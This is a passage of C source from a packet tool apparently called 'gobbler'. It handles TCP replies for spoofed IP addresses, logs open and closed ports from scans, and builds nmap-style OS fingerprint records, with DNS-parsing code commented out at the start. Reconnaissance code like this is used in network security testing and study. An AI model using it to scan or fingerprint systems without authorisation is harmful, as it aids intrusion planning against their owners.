				
				len = dns->buf[((dns->buf[t+1] & 0x00ff) - 0x0c)];
				g = ((dns->buf[t+1] & 0x00ff) - 0x0c)+1; 
				
				//printf("pointer len 0x%x\n",len);
				//printf("g= 0x%x %c\n", g, g);
			//	while(len != 0x00){
			//		if(len == 0xc0){
			//			goto ADDTOP;
						//printf("Opps: gobbler can;t handle dns names encoded twice\n");
						//printf("Email me if u get this warning and i try fix it\n\n");
						//exit(1);
			//		}
					for(i=0; i<len; i++){
						printf("%c",(u_char)dns->buf[g]);
						g++;
					}
					printf(".");
					len = (u_int8_t) dns->buf[g];
					//printf("new len = %d", len);
					g++;	
			//	}
				printf(" ");
				t++;
				t++;
				//exit(1);
			}
			else{
				for(i=0; i<len; i++){
					printf("%c",(u_char)dns->buf[t]);
					t++;
				}
			len = dns->buf[t];
			printf(".");
			t++; //jump past size
			printf(" ");
			}

		}	
		if((dns->buf[t]) != 0x00){
			printf("typeb1 = 0x%x\n", dns->buf[t]);
		}
		t++;
		
		if(dns->buf[t] & 0x01){
			printf("Type: Host address, ");
		}
		else if(dns->buf[t] & 0x0c){
			printf("Type: Domain name pointer, ");
		}
		else printf("typeb2 = 0x%x\n", dns->buf[t]);
		t++;
		
		if((dns->buf[t]) != 0x00){
			printf("classb1 = 0x%x\n", dns->buf[t]);
		}
		t++;
		
		if(dns->buf[t] & 0x01){
			printf("Class: Inet, ");
		}
		else printf("classb2 = 0x%x\n", dns->buf[t]);
		t++;
		
		printf("ttl %u\n", ntohl((u_int32_t)convert32(pbuf, t, t+1, t+2, t+3)));
//		printf("ttl: 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
//		printf("ttl: 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
//		printf("ttl: 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
//		printf("ttl: 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
	
		//HERE SORTING OUT DNS PACKETS
		
		dsize = (dns->buf[t] +	 dns->buf[t+1]);
		printf("data size: %d, ",dsize);

		//printf("data size 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
		
		//printf("data size 0x%x, ", (u_int8_t) dns->buf[t]);
		t++;
		
		
		printf("data: ");
		for(i=0;i<dsize;i++){
			printf("%d(%c) ",(u_int8_t)dns->buf[t],(u_int8_t)dns->buf[t]);
			t++;
		}
		printf("\n");
		f++;
	}
*/	printf("\n");

	return(0);
}

/*
void decodednsdata(char *ptr, int type, int len){
	printf("decode dns data\n");
}
*/
u_int8_t checkip(int syn, int ack, int fin, int rst, int psh, int urg, int bog)
{
	u_int8_t sendrst(int type);
	u_int8_t sendsynack(void);
	Packet *tsd;
	struct my_ip *ip;
	struct my_tcp *tcp;
	u_char *srcip, *dstip, *hname;
	struct in_addr host;
	int i = 0;
	PMT p_curr;
	u_int off = 0;
	int df = 0;
	char *acktype;
	char *p, *q, *u;
	u_int16_t tmpshort;
	int length;
	int opcode;
	struct tcphdr *tcpo;
	extern void *safe_zalloc(int size);
	struct AVal *AVsa, *AVsb, *AVsc, *AVsd, *AVse, *AVsf, *AVsg; //nmap
	struct AVal *AVpa, *AVpb, *AVpc, *AVpd; //port 0
	
	if((tsd = (pthread_getspecific(p_key))) == NULL){
		printf("Opps: pthread_getspecific error\n");
		exit(1);
	}

	ip = (struct my_ip*)(tsd->pkt + sizeof(struct ether_header));
	tcp = (struct my_tcp*)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip));
	tcpo = (struct tcphdr *)(tsd->pkt + sizeof(struct ether_header) + sizeof(struct my_ip)); 
	
	srcip = (u_char *)&(ip->ip_src);
	dstip = (u_char *)&(ip->ip_dst);
	
	if(portscan || nongportscan || osdetect){
		if(!inet_aton((char *)hostname, &host)){
			printf("Opps: invalid ip\n");
			cleanup(1);
		}
	
		hname = (u_char *)&(host.s_addr);
	}
	off = ntohs(ip->ip_off);
	if(off & IP_DF){
        	df = 1;
        }
        else {
		df = 0;
        }

	if(syn && ack && !rst && !fin && (portscan || nongportscan)){
		//SYN ACK = port open reply
		
		for(i=0;i<4;i++){
			if(srcip[i] != hname[i]){
				if(v>2)printf("Opps: srcip %d.%d.%d.%d scanning target %d.%d.%d.%d (connection from dif host)\n", srcip[0], srcip[1], srcip[2], srcip[3], hname[0], hname[1], hname[2], hname[3]);
				return(0);
			}
		}
	
		p_curr = mtpoint;
		if(p_curr == NULL){
			if(v>2) printf("Opps: checkip ll in empty\n\n");
			return(0);
		}
		while((p_curr != NULL) && (p_curr->ipaddress != ip->ip_dst)){
			p_curr = (PMT) p_curr->nextmt;
		}
		
		if(p_curr == NULL){
			if(v>2) printf("Opps: dst not in ip in gobbled ip list, packet is not for us\n");
			return(0);
		}

		//dst ip and gobbled ip match
		if(p_curr->type == TARGET){
			printf("tcp packet for target\n");
			return(0);
		}
		if(v)printf("%d.%d.%d.%d %d port open (%d.%d.%d.%d)\n", srcip[0], srcip[1], srcip[2], srcip[3], ntohs(tcp->th_sport), dstip[0], dstip[1], dstip[2], dstip[3]);
		
		if(addport(ntohs(tcp->th_sport), srcip, dstip) != 0){
			printf("Opps: port add failed\n");
		}
		if(vll)printportll();
			if(sendrst(RSTOPEN) != 0){
			printf("Opps: sendrst failed\n");
		}
	return(0);
	}

	else if(syn && !ack && !fin && !rst){
		//some one is trying to connect with a SYN
		p_curr = mtpoint;
		if(p_curr == NULL){
			if(v>2) printf("Opps: checkip ll in empty\n\n");
			return(0);
		}
		while((p_curr != NULL) && (p_curr->ipaddress != ip->ip_dst)){
			p_curr = (PMT) p_curr->nextmt;
		}
		
		if(p_curr == NULL){
			if(v>2) printf("Opps: dst ip not in gobbled ip list, packet is not for us\n");
			return(0);
		}

		printf("%d.%d.%d.%d:%d is trying to connect to %d.%d.%d.%d:%d.... one of our machines!!!!\n", srcip[0], srcip[1], srcip[2], srcip[3], ntohs(tcp->th_sport), dstip[0], dstip[1], dstip[2], dstip[3], ntohs(tcp->th_dport));
		
		//send rst or open
		if(ntohs(tcp->th_dport) != opentcpport) {
			//printf("Sending RST\n");
			if(sendrst(RSTCLOSED) != 0){
				printf("Opps: sendrst failed\n");
			}
			return(0);
		}

		else{
			if(v)printf("Send SYN ACK to establish connection\n");
			if(sendsynack() != 0){
				printf("Opps: send SYN ACK failed\n");
			}
			return(0);
		}
	}

	else if(!syn && ack && !fin && rst && portscanningstarted && (portscan || nongportscan)){
		//return from closed port.... in portscan
		p_curr = mtpoint;

		if(p_curr == NULL){
			if(v>2) printf("Opps: checkip ll in empty\n\n");
			return(0);
		}
		while((p_curr != NULL) && (p_curr->ipaddress != ip->ip_dst)){
			p_curr = (PMT) p_curr->nextmt;
		}
		
		if(p_curr == NULL){
			if(v>1)printf("Opps: dst ip %d.%d.%d.%d not in gobbled ip list, packet is not for us\n", dstip[0], dstip[1], dstip[2], dstip[3]);
			return(0);
		}

	//	printf("%d.%d.%d.%d %d port closed (%d.%d.%d.%d)\n", srcip[0], srcip[1], srcip[2], srcip[3], ntohs(tcp->th_sport), dstip[0], dstip[1], dstip[2], dstip[3]);
		if(addcport(ntohs(tcp->th_sport), srcip, dstip) != 0){
			printf("Opps: add port closed failed\n");
		}
		if(vll)printcportll();
	}
	
	else if(osdetect || portzerotest){
		//printf("T1 packet\n");
		p_curr = mtpoint;
		if(p_curr == NULL){
			if(v)printf("Opps: checkll empty\n\n");
			return(0);
		}
		while((p_curr != NULL) && (p_curr->ipaddress != ip->ip_dst)){
			p_curr = (PMT) p_curr->nextmt;
		}
		
		if(p_curr == NULL){
			if(v>2)printf("Opps: dst ip %d.%d.%d.%d not in gobbled ip list, packet is not for us\n", dstip[0], dstip[1], dstip[2], dstip[3]);
			return(0);
		}
		//found packet for of our spoofed hosts
		for(i=0;i<4;i++){
			if(srcip[i] != hname[i]){
				if(v)printf("Opps: srcip %d.%d.%d.%d scanning target %d.%d.%d.%d (connection from dif host)\n", srcip[0], srcip[1], srcip[2], srcip[3], hname[0], hname[1], hname[2], hname[3]);
				return(0);
			}
		}
		if(p1){
			if(p1src != ntohs(tcp->th_dport)){
				if(v)printf("Port 0 test P1... src port doesn;t match\n");
				return(0);
			}
			if(p1dst != ntohs(tcp->th_sport)){
				if(v)printf("Port 0 test P1... dst port doesn;t match\n");
				return(0);
			}
			if(!p1rec) p1rec = 1;
			else{
				if(v)printf("already recieved answer to port 0 test P1\n");
				return(0);
			}
	 
	                PFPs[portzerotestcounter] = (FingerPrint *) safe_zalloc(sizeof(FingerPrint));
                        PFPs[portzerotestcounter]->name = "P1";
                        AVpa = (struct AVal *) malloc(2 * sizeof(struct AVal));
                        AVpa[0].next = &AVpa[1];
                        AVpa[1].next = NULL;

                        AVpa[0].attribute = "Resp";
                        strcpy(AVpa[0].value, "Y");
		
			AVpa[1].attribute = "Flags";
                        u = AVpa[1].value;
			if (tcp->th_flags & TH_BOG) *u++ = 'B';
                        if (tcp->th_flags & TH_URG) *u++ = 'U';
                        if (tcp->th_flags & TH_ACK) *u++ = 'A';
                        if (tcp->th_flags & TH_PUSH) *u++ = 'P';
                        if (tcp->th_flags & TH_RST) *u++ = 'R';
                        if (tcp->th_flags & TH_SYN) *u++ = 'S';
                        if (tcp->th_flags & TH_FIN) *u++ = 'F';
                        *u++ = '\0';
			
			printf("P1(Resp=Y%%Flags=%s)\n",AVpa[1].value);
			PFPs[portzerotestcounter]->results = AVpa;	
			portzerotestcounter++;
			p1reply = 1;
		}
	
		else if(p2){
                        if(p2src != ntohs(tcp->th_dport)){
                                if(v)printf("Port 0 test P2... src port doesn;t match\n");
                                return(0);
                        }
                        if(p2dst != ntohs(tcp->th_sport)){
                                if(v)printf("Port 0 test P2... dst port doesn;t match\n");
				return(0);
			}
                        if(!p2rec) p1rec = 1;
                        else{
                                if(v)printf("already recieved answer to port 0 test P2\n");
                                return(0);
                        }
			PFPs[portzerotestcounter] = (FingerPrint *) safe_zalloc(sizeof(FingerPrint));
                        PFPs[portzerotestcounter]->name = "P2";
                        AVpb = (struct AVal *) malloc(2 * sizeof(struct AVal));
                        AVpb[0].next = &AVpb[1];
                        AVpb[1].next = NULL;	
                        AVpb[0].attribute = "Resp";
                        strcpy(AVpb[0].value, "Y");

                        AVpb[1].attribute = "Flags";

			u = AVpb[1].value;
                        if (tcp->th_flags & TH_BOG) *u++ = 'B';
                        if (tcp->th_flags & TH_URG) *u++ = 'U';
                        if (tcp->th_flags & TH_ACK) *u++ = 'A';
                        if (tcp->th_flags & TH_PUSH) *u++ = 'P';
                        if (tcp->th_flags & TH_RST) *u++ = 'R';
                        if (tcp->th_flags & TH_SYN) *u++ = 'S';
                        if (tcp->th_flags & TH_FIN) *u++ = 'F';
                        *u++ = '\0';
                    
			printf("P2(Resp=Y%%Flags=%s)\n",AVpb[1].value);
			PFPs[portzerotestcounter]->results = AVpb;	
                        portzerotestcounter++;
			p2reply = 1;
                }
                else if(p3){
                        if(p3src != ntohs(tcp->th_dport)){
                                if(v)printf("Port 0 test P3... src port doesn;t match\n");
                                return(0);
                        }
                        if(p3dst != ntohs(tcp->th_sport)){
                                if(v)printf("Port 0 test P3... dst port doesn;t match\n");
				return(0);
			}
                        if(!p3rec) p3rec = 1;
                        else{
                                if(v)printf("already recieved answer to port 0 test P3\n");
                                return(0);
                        }
                        PFPs[portzerotestcounter] = (FingerPrint *) safe_zalloc(sizeof(FingerPrint));
                        PFPs[portzerotestcounter]->name = "P3";
                        AVpc = (struct AVal *) malloc(2 * sizeof(struct AVal));
                        AVpc[0].next = &AVpc[1];
                        AVpc[1].next = NULL;
                        AVpc[0].attribute = "Resp";
                        strcpy(AVpc[0].value, "Y");

                        AVpc[1].attribute = "Flags";

                        u = AVpc[1].value;
                        if (tcp->th_flags & TH_BOG) *u++ = 'B';
                        if (tcp->th_flags & TH_URG) *u++ = 'U';
                        if (tcp->th_flags & TH_ACK) *u++ = 'A';
                        if (tcp->th_flags & TH_PUSH) *u++ = 'P';
                        if (tcp->th_flags & TH_RST) *u++ = 'R';
                        if (tcp->th_flags & TH_SYN) *u++ = 'S';
                        if (tcp->th_flags & TH_FIN) *u++ = 'F';
                        *u++ = '\0';

			printf("P3(Resp=Y%%Flags=%s)\n",AVpc[1].value);
			PFPs[portzerotestcounter]->results = AVpc;	
                        portzerotestcounter++;
                        p3reply = 1;
                }

                else if(p4){
                        if(p4src != ntohs(tcp->th_dport)){
                                if(v)printf("Port 0 test P4... src port doesn;t match\n");
                                return(0);
                        }
                        if(p4dst != ntohs(tcp->th_sport)){
                                if(v)printf("Port 0 test P4... dst port doesn;t match\n");
				return(0);
			}
                        if(!p4rec) p4rec = 1;
                        else{
                                if(v)printf("already recieved answer to port 0 test P4\n");
                                return(0);
                        }
			
			PFPs[portzerotestcounter] = (FingerPrint *) safe_zalloc(sizeof(FingerPrint));
                        PFPs[portzerotestcounter]->name = "P4";
                        AVpd = (struct AVal *) malloc(2 * sizeof(struct AVal));
                        AVpd[0].next = &AVpd[1];
                        AVpd[1].next = NULL;
                        AVpd[0].attribute = "Resp";
                        strcpy(AVpd[0].value, "Y");

                        AVpd[1].attribute = "Flags";

                        u = AVpd[1].value;
                        if (tcp->th_flags & TH_BOG) *u++ = 'B';
                        if (tcp->th_flags & TH_URG) *u++ = 'U';
                        if (tcp->th_flags & TH_ACK) *u++ = 'A';
                        if (tcp->th_flags & TH_PUSH) *u++ = 'P';
                        if (tcp->th_flags & TH_RST) *u++ = 'R';
                        if (tcp->th_flags & TH_SYN) *u++ = 'S';
                        if (tcp->th_flags & TH_FIN) *u++ = 'F';
                        *u++ = '\0';

                        printf("P4(Resp=Y%%Flags=%s)\n",AVpd[1].value);
			PFPs[portzerotestcounter]->results = AVpd;
                        portzerotestcounter++;
                        p4reply = 1;
                }

		else if(t1){
			if(t1port != ntohs(tcp->th_dport)){
				if(v)printf("OS detect.... src port doesn't match\n");
				//printf("t1port %d, dport %d %d\n", t1port, tcp->th_dport, ntohs(tcp->th_dport));
				return(0);
                        
			}
			
			if(!t1rec) t1rec = 1; 
			else {
				if(v)printf("already recieved answer to OS test 1\n");
				return(0); //already recieved answered so return
			}
			
			FPs[testcounter] = (FingerPrint *) safe_zalloc(sizeof(FingerPrint));  
			FPs[testcounter]->name = "T1";
			AVsa = (struct AVal *) malloc(6 * sizeof(struct AVal));
                        AVsa[0].next = &AVsa[1];
                        AVsa[1].next = &AVsa[2];
                        AVsa[2].next = &AVsa[3];
                        AVsa[3].next = &AVsa[4];
                        AVsa[4].next = &AVsa[5];
                        AVsa[5].next = NULL;
			
			AVsa[0].attribute = "Resp";
                        strcpy(AVsa[0].value, "Y");
			AVsa[1].attribute = "DF";
			if(df){
				strcpy(AVsa[1].value, "Y");
			}
			else{
				strcpy(AVsa[1].value, "N");
			}

						
			AVsa[2].attribute = "W";
			sprintf(AVsa[2].value, "%hX", ntohs(tcp->th_win));
			
			AVsa[3].attribute = "ACK";
			if(tcp->th_ack == htonl(t1seq)){
				if(v>1)printf("same ack as sent seq\n");
				acktype = ACKMATCH;
				strcpy(AVsa[3].value, "S");
			}
			else if(tcp->th_ack == htonl(t1seq + 1)){
				if(v>1)printf("ack +1 of sent seq\n");
				acktype = ACKMATCHPLUS;
				strcpy(AVsa[3].value, "S++");
			}
			else if(tcp->th_ack == 0){
				if(v>1)printf("ack = 0\n");
				acktype = ACKNOMATCH;
				strcpy(AVsa[3].value, "O");
			}
			else {
				if(v>1)printf("ack != seq matches\n");
				acktype = ACKNOMATCH;
				strcpy(AVsa[3].value, "O");
			}

			//printf("Parse options\n\n");
			AVsa[4].attribute = "Flags";	
			u = AVsa[4].value;
			if (tcp->th_flags & TH_BOG) *u++ = 'B';
			if (tcp->th_flags & TH_URG) *u++ = 'U';
			if (tcp->th_flags & TH_ACK) *u++ = 'A';
			if (tcp->th_flags & TH_PUSH) *u++ = 'P';
			if (tcp->th_flags & TH_RST) *u++ = 'R';
			if (tcp->th_flags & TH_SYN) *u++ = 'S';
			if (tcp->th_flags & TH_FIN) *u++ = 'F';
			*u++ = '\0';
		
			//ripped fromn nmap source.... originally ripped from linux source code ;)
			AVsa[5].attribute = "Ops";
			p = AVsa[5].value;
			length = (TH_OFF(tcp) * 4) - sizeof(struct my_tcp);
			q = ((char *)tcp) + sizeof(struct my_tcp);

			while((length > 0) && ((p - AVsa[5].value) < (int) sizeof(AVsa[5].value) - 3)){
				//printf("length %d, p - val %d, sizeof %d\n",length, p - AVsa[5].value, (int) sizeof(AVsa[5].value -3));
				opcode=*q++;
				length--;
				if(!opcode){
					*p++ = 'L'; //End of list
					break;
				}
				else if (opcode == 1){
					*p++ = 'N'; //No Op
				}
				else if (opcode == 2){
					*p++ = 'M'; //MSS
					q++;
					memcpy(&tmpshort, q, 2);
					if(ntohs(tmpshort) == 265) *p++ = 'E'; //Echoed
					q += 2;
					length -= 3;
				}
				else if (opcode == 3) {
					*p++ = 'W'; //Window size
					q += 2;
					length -= 2;
				}
				else if (opcode == 8){
					*p++ = 'T'; //Timestamp
					q += 9;
					length -= 9;
				}
			}
			*p++ = '\0';

			printf("T1(Resp=Y%%DF=%s%%W=%X%%ACK=%s%%Flags=%s%s%s%s%s%s%s%%Ops=%s)\n", df ? "Y" : "N", ntohs(tcp->th_win), acktype, bog ? "B" : "",  urg ? "U" : "", ack ? "A" : "", psh ? "P" : "", rst ? "R" : "", syn ? "S" : "", fin ? "F" : "", AVsa[5].value);
			
			FPs[testcounter]->results = AVsa;
			testcounter++;
			t1reply = 1;
		}

		if(t2){
			if(t2port != ntohs(tcp->th_dport)){
				if(v)printf("OS detect.... src port doesn't match\n");
				return(0);
			}
						
			if(!t2rec) t2rec = 1; 
			else return(0); //already recieved answered so return
			
			FPs[testcounter] = (FingerPrint *) safe_zalloc(sizeof(FingerPrint));  
			FPs[testcounter]->name = "T2";
			AVsb = (struct AVal *) malloc(6 * sizeof(struct AVal));
                        AVsb[0].next = &AVsb[1];
                        AVsb[1].next = &AVsb[2];
                        AVsb[2].next = &AVsb[3];
                        AVsb[3].next = &AVsb[4];
                        AVsb[4].next = &AVsb[5];
                        AVsb[5].next = NULL;
			
			AVsb[0].attribute = "Resp";
                        strcpy(AVsb[0].value, "Y");
			AVsb[1].attribute = "DF";
			if(df){
				strcpy(AVsb[1].value, "Y");
			}
			else{
				strcpy(AVsb[1].value, "N");
			}

			AVsb[2].attribute = "W";
                        sprintf(AVsb[2].value, "%hX", ntohs(tcp->th_win));

                        AVsb[3].attribute = "ACK";
                        if(tcp->th_ack == htonl(t2seq)){
                                if(v>1)printf("same ack as sent seq\n");
                                acktype = ACKMATCH;
                                strcpy(AVsb[3].value, "S");
                        }
                        else if(tcp->th_ack == htonl(t2seq + 1)){
                                if(v>1)printf("ack +1 of sent seq\n");
                                acktype = ACKMATCHPLUS;
                                strcpy(AVsb[3].value, "S++");
                        }
                        else if(tcp->th_ack == 0){
                                if(v>1)printf("ack = 0\n");
                                acktype = ACKNOMATCH;
                                strcpy(AVsb[3].value, "O");
                        }
                        else {
                                if(v>1)printf("ack != seq matches\n");
                                acktype = ACKNOMATCH;
                                strcpy(AVsb[3].value, "O");
			}
			
			//printf("Parse options\n\n");
                        AVsb[4].attribute = "Flags";
                        u = AVsb[4].value;
                        if (tcp->th_flags & TH_BOG) *u++ = 'B';
                        if (tcp->th_flags & TH_URG) *u++ = 'U';
                        if (tcp->th_flags & TH_ACK) *u++ = 'A';
                        if (tcp->th_flags & TH_PUSH) *u++ = 'P';
                        if (tcp->th_flags & TH_RST) *u++ = 'R';
                        if (tcp->th_flags & TH_SYN) *u++ = 'S';
                        if (tcp->th_flags & TH_FIN) *u++ = 'F';
                        *u++ = '\0';

                        //ripped fromn nmap source.... originally ripped from linux source code ;)
                        AVsb[5].attribute = "Ops";
                        p = AVsb[5].value;
                        length = (TH_OFF(tcp) * 4) - sizeof(struct my_tcp);
                        q = ((char *)tcp) + sizeof(struct my_tcp);

                        while((length > 0) && ((p - AVsb[5].value) < (int) sizeof(AVsb[5].value) - 3)){
                                //printf("length %d, p - val %d, sizeof %d\n",length, p - AVsa[5].value, (int) sizeof(AVsa[5].value -3));
				opcode=*q++;
                                length--;
                                if(!opcode){
                                        *p++ = 'L'; //End of list
                                        break;
                                }
                                else if (opcode == 1){
                                        *p++ = 'N'; //No Op
                                }
                                else if (opcode == 2){
                                        *p++ = 'M'; //MSS
                                        q++;
                                        memcpy(&tmpshort, q, 2);
                                        if(ntohs(tmpshort) == 265) *p++ = 'E'; //Echoed
                                        q += 2;
                                        length -= 3;
                                }
                                else if (opcode == 3) {
                                        *p++ = 'W'; //Window size
                                        q += 2;
                                        length -= 2;
                                }
				else if (opcode == 8){
                                        *p++ = 'T'; //Timestamp
                                        q += 9;
                                        length -= 9;
                                }
                        }
                        *p++ = '\0';

			printf("T2(Resp=Y%%DF=%s%%W=%X%%ACK=%s%%Flags=%s%s%s%s%s%s%s%%Ops=%s)\n", df ? "Y" : "N", ntohs(tcp->th_win), acktype, bog ? "B" : "",  urg ? "U" : "", ack ? "A" : "", psh ? "P" : "", rst ? "R" : "", syn ? "S" : "", fin ? "F" : "" , AVsb[5].value);
			t2reply = 1;
			FPs[testcounter]->results = AVsb;
			testcounter++;
		}
		
		if(t3){
			if(t3port != ntohs(tcp->th_dport)){
				if(v)printf("OS detect.... src port doesn't match\n");
				return(0);
			}
			if(!t3rec) t3rec = 1; 
			else return(0); //already recieved answered so return
	
			FPs[testcounter] = (FingerPrint *) safe_zalloc(sizeof(FingerPrint));  
			FPs[testcounter]->name = "T3";
			AVsc = (struct AVal *) malloc(6 * sizeof(struct AVal));
                        AVsc[0].next = &AVsc[1];
                        AVsc[1].next = &AVsc[2];
                        AVsc[2].next = &AVsc[3];
                        AVsc[3].next = &AVsc[4];
                        AVsc[4].next = &AVsc[5];
                        AVsc[5].next = NULL;

                        AVsc[0].attribute = "Resp";
                        strcpy(AVsc[0].value, "Y");
                        AVsc[1].attribute = "DF";
                        if(df){
                                strcpy(AVsc[1].value, "Y");
                        }
                        else{
                                strcpy(AVsc[1].value, "N");
                        }

                        AVsc[2].attribute = "W";
                        sprintf(AVsc[2].value, "%hX", ntohs(tcp->th_win));

                        AVsc[3].attribute = "ACK";
                        if(tcp->th_ack == htonl(t3seq)){
                                if(v>1)printf("same ack as sent seq\n");
                                acktype = ACKMATCH;
                                strcpy(AVsc[3].value, "S");
                        }
                        else if(tcp->th_ack == htonl(t3seq + 1)){
                                if(v>1)printf("ack +1 of sent seq\n");
                                acktype = ACKMATCHPLUS;
                                strcpy(AVsc[3].value, "S++");
                        }
                        else if(tcp->th_ack == 0){
                                if(v>1)printf("ack = 0\n");
                                acktype = ACKNOMATCH;
                                strcpy(AVsc[3].value, "O");
                        }
                        else {
                                if(v>1)printf("ack != seq matches\n");
                                acktype = ACKNOMATCH;
                                strcpy(AVsc[3].value, "O");
                        }

                        //printf("Parse options\n\n");
			AVsc[4].attribute = "Flags";
                        u = AVsc[4].value;
                        if (tcp->th_flags & TH_BOG) *u++ = 'B';
                        if (tcp->th_flags & TH_URG) *u++ = 'U';
                        if (tcp->th_flags & TH_ACK) *u++ = 'A';
                        if (tcp->th_flags & TH_PUSH) *u++ = 'P';
                        if (tcp->th_flags & TH_RST) *u++ = 'R';
                        if (tcp->th_flags & TH_SYN) *u++ = 'S';
                        if (tcp->th_flags & TH_FIN) *u++ = 'F';
                        *u++ = '\0';

                        //ripped fromn nmap source.... originally ripped from linux source code ;)
                        AVsc[5].attribute = "Ops";
                        p = AVsc[5].value;
                        length = (TH_OFF(tcp) * 4) - sizeof(struct my_tcp);
                        q = ((char *)tcp) + sizeof(struct my_tcp);

                        while((length > 0) && ((p - AVsc[5].value) < (int) sizeof(AVsc[5].value) - 3)){
                                //printf("length %d, p - val %d, sizeof %d\n",length, p - AVsa[5].value, (int) sizeof(AVsa[5].value -3));
                                opcode=*q++;
                                length--;
                                if(!opcode){
                                        *p++ = 'L'; //End of list
                                        break;
                                }
                                else if (opcode == 1){
                                        *p++ = 'N'; //No Op
                                }
                                else if (opcode == 2){
                                        *p++ = 'M'; //MSS
                                        q++;
                                        memcpy(&tmpshort, q, 2);
                                        if(ntohs(tmpshort) == 265) *p++ = 'E'; //Echoed
                                        q += 2;
                                        length -= 3;
                                }
                                else if (opcode == 3) {
                                        *p++ = 'W'; //Window size
                                        q += 2;
                                        length -= 2;
                                }
                                else if (opcode == 8){
                                        *p++ = 'T'; //Timestamp
					q += 9;
                                        length -= 9;
                                }
                        }
                        *p++ = '\0';
	
			printf("T3(Resp=Y%%DF=%s%%W=%X%%ACK=%s%%Flags=%s%s%s%s%s%s%s%%Ops=%s)\n", df ? "Y" : "N", ntohs(tcp->th_win), acktype, bog ? "B" : "",  urg ? "U" : "", ack ? "A" : "", psh ? "P" : "", rst ? "R" : "", syn ? "S" : "", fin ? "F" : "", AVsc[5].value );
			t3reply = 1;
			FPs[testcounter]->results = AVsc;
			testcounter++;
		}

		if(t4){
			if(t4port != ntohs(tcp->th_dport)){
				if(v)printf("OS detect.... src port doesn't match\n");
				return(0);
			}
			
			if(!t4rec) t4rec = 1; 
			else return(0); //already recieved answered so return
			
			FPs[testcounter] = (FingerPrint *) safe_zalloc(sizeof(FingerPrint));  
			FPs[testcounter]->name = "T4";
			AVsd = (struct AVal *) malloc(6 * sizeof(struct AVal));
                        AVsd[0].next = &AVsd[1];
                        AVsd[1].next = &AVsd[2];
                        AVsd[2].next = &AVsd[3];
                        AVsd[3].next = &AVsd[4];
                        AVsd[4].next = &AVsd[5];
                        AVsd[5].next = NULL;

                        AVsd[0].attribute = "Resp";
                        strcpy(AVsd[0].value, "Y");
                        AVsd[1].attribute = "DF";
                        if(df){
                                strcpy(AVsd[1].value, "Y");
                        }
                        else{
                                strcpy(AVsd[1].value, "N");
                        }

                        AVsd[2].attribute = "W";
                        sprintf(AVsd[2].value, "%hX", ntohs(tcp->th_win));

                        AVsd[3].attribute = "ACK";
                        if(tcp->th_ack == htonl(t4seq)){
                                if(v>1)printf("same ack as sent seq\n");
                                acktype = ACKMATCH;
                                strcpy(AVsd[3].value, "S");
                        }
                        else if(tcp->th_ack == htonl(t4seq + 1)){
                                if(v>1)printf("ack +1 of sent seq\n");
                                acktype = ACKMATCHPLUS;
                                strcpy(AVsd[3].value, "S++");
                        }
                        else if(tcp->th_ack == 0){
                                if(v>1)printf("ack = 0\n");
                                acktype = ACKNOMATCH;
                                strcpy(AVsd[3].value, "O");
                        }
                        else {
                                if(v>1)printf("ack != seq matches\n");
                                acktype = ACKNOMATCH;
                                strcpy(AVsd[3].value, "O");
                        }

                        //printf("Parse options\n\n");
			AVsd[4].attribute = "Flags";
                        u = AVsd[4].value;
                        if (tcp->th_flags & TH_BOG) *u++ = 'B';
                        if (tcp->th_flags & TH_URG) *u++ = 'U';
                        if (tcp->th_flags & TH_ACK) *u++ = 'A';
                        if (tcp->th_flags & TH_PUSH) *u++ = 'P';
                        if (tcp->th_flags & TH_RST) *u++ = 'R';
                        if (tcp->th_flags & TH_SYN) *u++ = 'S';
                        if (tcp->th_flags & TH_FIN) *u++ = 'F';
                        *u++ = '\0';

                        //ripped fromn nmap source.... originally ripped from linux source code ;)
                        AVsd[5].attribute = "Ops";
                        p = AVsd[5].value;
                        length = (TH_OFF(tcp) * 4) - sizeof(struct my_tcp);
                        q = ((char *)tcp) + sizeof(struct my_tcp);

                        while((length > 0) && ((p - AVsd[5].value) < (int) sizeof(AVsd[5].value) - 3)){
                                //printf("length %d, p - val %d, sizeof %d\n",length, p - AVsa[5].value, (int) sizeof(AVsa[5].value -3));
                                opcode=*q++;
                                length--;
                                if(!opcode){
                                        *p++ = 'L'; //End of list
                                        break;
                                }
                                else if (opcode == 1){
                                        *p++ = 'N'; //No Op
                                }
                                else if (opcode == 2){
                                        *p++ = 'M'; //MSS
                                        q++;
                                        memcpy(&tmpshort, q, 2);
                                        if(ntohs(tmpshort) == 265) *p++ = 'E'; //Echoed
                                        q += 2;
                                        length -= 3;
                                }
                                else if (opcode == 3) {
                                        *p++ = 'W'; //Window size
                                        q += 2;
                                        length -= 2;
                                }
                                else if (opcode == 8){
                                        *p++ = 'T'; //Timestamp
					q += 9;
                                        length -= 9;
                                }
                        }
                        *p++ = '\0';
	
			printf("T4(Resp=Y%%DF=%s%%W=%X%%ACK=%s%%Flags=%s%s%s%s%s%s%s%%Ops=%s)\n", df ? "Y" : "N", ntohs(tcp->th_win), acktype, bog ? "B" : "",  urg ? "U" : "", ack ? "A" : "", psh ? "P" : "", rst ? "R" : "", syn ? "S" : "", fin ? "F" : "" , AVsd[5].value);
			t4reply = 1;
			FPs[testcounter]->results = AVsd;
			testcounter++;
		}
	
		if(t5){
			if(t5port != ntohs(tcp->th_dport)){
				if(v)printf("OS detect.... src port doesn't match\n");
				return(0);
			}
			
			if(!t5rec) t5rec = 1; 
			else return(0); //already recieved answered so return
		
			FPs[testcounter] = (FingerPrint *) safe_zalloc(sizeof(FingerPrint));  
			FPs[testcounter]->name = "T5";
			
			AVse = (struct AVal *) malloc(6 * sizeof(struct AVal));
                        AVse[0].next = &AVse[1];
                        AVse[1].next = &AVse[2];
                        AVse[2].next = &AVse[3];
                        AVse[3].next = &AVse[4];
                        AVse[4].next = &AVse[5];
                        AVse[5].next = NULL;

                        AVse[0].attribute = "Resp";
                        strcpy(AVse[0].value, "Y");
                        AVse[1].attribute = "DF";
                        if(df){
                                strcpy(AVse[1].value, "Y");
                        }
                        else{
                                strcpy(AVse[1].value, "N");
                        }

                        AVse[2].attribute = "W";
                        sprintf(AVse[2].value, "%hX", ntohs(tcp->th_win));

                        AVse[3].attribute = "ACK";
                        if(tcp->th_ack == htonl(t5seq)){
                                if(v>1)printf("same ack as sent seq\n");
                                acktype = ACKMATCH;
